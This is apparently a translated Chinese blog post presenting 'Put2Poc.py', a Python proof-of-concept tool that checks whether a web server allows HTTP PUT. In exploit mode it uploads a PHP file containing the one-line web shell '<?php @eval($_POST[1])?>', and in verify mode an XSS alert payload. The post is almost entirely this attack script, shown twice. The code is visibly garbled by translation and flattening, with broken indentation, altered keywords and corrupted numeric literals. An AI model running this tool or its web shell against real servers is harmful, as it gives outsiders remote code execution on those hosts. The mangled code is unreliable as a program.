Environment
Python 2.7 requests sysWindows 7Apache 已完成put配置。PHP
Apache put configuration
Brief introduction of the source code, to increase readability. The POC entry function, which sets the default variables, accepts and determines whether the user input parameters are valid, invokes probing for unsafe HTTP method functions Test2option (Url,yn), accepts the returned supported methods, and calls the Put method to upload the file.
def main (): If Len (SYS.ARGV) < 2:print u ' version:1.0 enter the URL to be validated (eg:Put2Poc.py http://test.com) put2poc.py arg1 arg2 arg1: Destination URL arg2: Select (1) verify or (2) exploit (default = Validate) Arg3: Select the directory to upload the file, default to/(eg:/test/) Arg4: Set file name for long pass , the default is test.html ARG5: Set a specific exploit payload (the default exploit is: <?php @eval ($_post[1])?>) Note: The current version only supports the use of the PHP language ' sys.exit () If Len (sys.argv) >= 2:url = sys.argv[1] YN = 1 path = '/' filename = ' test.html ' Content = None # print URL if ' http ' not in url:print U ' Please enter protocol Http/https (eg:Put2Poc.py http://t est.com) ' Sys.exit () If Len (SYS.ARGV) >= 3: # Print type (sys.argv[2]) if SYS.A Rgv[2] in ' 2 ': filename = ' test.php ' if sys.argv[2] not in [' 1 ', ' 2 ']: print u ' output In the wrong setting, select the correct setting (1: Verify: Use) ' sys.exit () YN = sys.argv[2] If Len (SYS.ARGV) >= 4: Path = Sys.argv[3] If Len (sys.argv) >= 5:filename = sys.argv[4] If Len (sys.argv) >= 6:content = SYS.ARGV[5] If Len (sys.argv) > 6:print u ' please check the parameter settings ' Sys.exit () r_options = Test2option (Url,yn) If content is not None:put2file (url,yn,r_options,path,filename,content) else:put2file (url,yn,r_options , path,filename) # print R_options
Error2status (code) to determine the return status of the request.
参数 code : 请求返回的状态码
def Error2status(code): if 400 <= code < 500: return 4 if 500 <= code < 600 : return 5 if 200 <= code < 400 : return True
Test2option (Url,yn) to detect if the target URL supports the options method
参数 url : 请求的URL参数 YN : 选择验证漏洞或者利用漏洞,默认为验证。
def Test2Option(url,YN): try: r = requests.options(url,verify=False,timeout=10) except : print u‘Error,请检查链接是否可以访问‘ sys.exit() r_options = r.headers r_status_code = Error2status(r.status_code) if r_status_code == 4 : print u‘%s Client Error for url: %s‘ % (r.status_code,url) print u‘该链接不支持OPTIONS方法‘ sys.exit() if r_status_code == 5 : print u‘%s Server Error for url: %s‘ % (r.status_code,url) print u‘请检查链接是否可以访问‘ sys.exit() if r_status_code is True : print u‘该链接存在不安全的HTTP方法‘ print r_options[‘Allow‘] return r_options[‘Allow‘]
Put2file (Url,yn,r_options,path,filename,content=none)
参数 url : 测试的URL参数 YN : 选择验证漏洞或者利用漏洞,默认为验证。参数 r_options : 网站所支持的HTTP请求方法。参数 path : 文件上传位置参数 filename : 文件名参数 content : 自定义文件内容。
def put2file (url,yn,r_options,path,filename,content=none): url = url.rstrip ('/') + path + filename Print URL head ers = {' Accept ': ' */* ', ' accept-language ': ' en-us ', ' user-agent ': ' Mozilla/4.0 (compatible; MSIE 6.0; WIN32) '} data = ' <script>alert (1) </script> ' If YN is ' 2 ': data = ' <?php @eval ($_post[1] )?> ' If content is not None:data = content R = Requests.put (url,headers=headers,data=data) r _status_code = Error2status (r.status_code) if r_status_code = = 4:print U '%s Client Error for URL:%s '% (R.sta Tus_code,url) Print U ' server prohibits uploading files ' if R_status_code = = 5:print U '%s server Error for URL:%s '% (r.status _code,url) Print U ' server prohibits uploading files ' if R_status_code is true:print u ' Server Status code:%s '% (R.status_code) Print U ' server supports put file upload ' Print u ' filename:%s '% (filename) print u ' file contents:%s '% (data) print U ' file The long passing position is: %s '% (path) print U ' file link:%s '% (URL) print R.content
Poc
#/usr/bin/env python#coding:utf-8# #Author: Nw01f#date:2018.01.11#version:1.0#import requestsimport sysdef Error2status (Code): If <= code < 500:return 4 if <= code < 600:return 5 if 2 XX <= Code < 400:return truedef Test2option (url,yn): Try:r = Requests.options (url,verify=false,t imeout=10) except:print u ' Error, please check if the link can be accessed ' sys.exit () r_options = r.headers R_status_code = ERR Or2status (r.status_code) if r_status_code = = 4:print U '%s Client Error for URL:%s '% (R.status_code,url) Print U ' This link does not support the Options method ' Sys.exit () if R_status_code = = 5:print U '%s Server Error for URL:%s '% (R. Status_code,url) print U ' Please check if the link can access ' sys.exit () if R_status_code is true:print u ' the link has an unsafe HTTP party FA ' Print r_options[' Allow '] return r_options[' Allow ']def put2file (Url,yn,r_options,path,filename,content=non e): url = url.rstrip ('/') + Path + filename Print URL headers = {' Accept ': ' */* ', ' accept-language ': ' en-us ', ' user-agent ': ' Mozilla/4.0 (compat ible; MSIE 6.0; WIN32) '} data = ' <script>alert (1) </script> ' If YN is ' 2 ': data = ' <?php @eval ($_post[1] )?> ' If content is not None:data = content R = Requests.put (url,headers=headers,data=data) r _status_code = Error2status (r.status_code) if r_status_code = = 4:print U '%s Client Error for URL:%s '% (R.sta Tus_code,url) Print U ' server prohibits uploading files ' if R_status_code = = 5:print U '%s server Error for URL:%s '% (r.status _code,url) Print U ' server prohibits uploading files ' if R_status_code is true:print u ' Server Status code:%s '% (R.status_code) Print U ' server supports put file upload ' Print u ' filename:%s '% (filename) print u ' file contents:%s '% (data) print U ' file The long passing position is: %s '% (path) print U ' file Link:%s '% (URL) print R.contentdef main (): If Len (SYS.ARGV) < 2:print u "Version:1.0 Enter the URL that will be validated (eg:Put2Poc.py http://test.com) put2poc.py arg1 arg2 arg1: Destination URL arg2: Select (1) verify or (2) exploit (default = Verification) Arg3: Select the directory to upload the file, default to/(eg:/test/) Arg4: Set the file name of the long-passing file, default to test.html ARG5: Set a specific exploit payload (default exploit is: <?php @eval ($_p OST[1]?>) Note: The current version only supports the use of the PHP language ' sys.exit () If Len (sys.argv) >= 2:url = sys.argv[1] YN = 1 Path = '/' filename = ' test.html ' content = None # print URL if ' http ' not in URL : Print U ' Please enter protocol Http/https (eg:Put2Poc.py http://test.com) ' Sys.exit () If Len (SYS.ARGV) >= 3 : # Print type (sys.argv[2]) if sys.argv[2] in ' 2 ': filename = ' test.php ' If sys.argv[2] not in [' 1 ', ' 2 ']: The settings of the print U ' input are incorrect, please select the correct setting (1: Verify: Use) ' Sys.exit () YN = sys.argv[2] If Len (sys.argv) >= 4:path = sys.argv[3] If Len (SYS.ARGV) >= 5: filename = Sys.argV[4] If Len (sys.argv) >= 6:content = sys.argv[5] If len (sys.argv) > 6:print u ' please check the parameter setting Reset ' Sys.exit () r_options = Test2option (Url,yn) If content is not none:put2file (Url,yn,r_options,path, filename,content) Else:put2file (url,yn,r_options,path,filename) # print R_optionsif __name__ = = ' __main__ ': Main ()
Note: You are welcome to correct and propose amendments.
Put upload poc--put2poc.py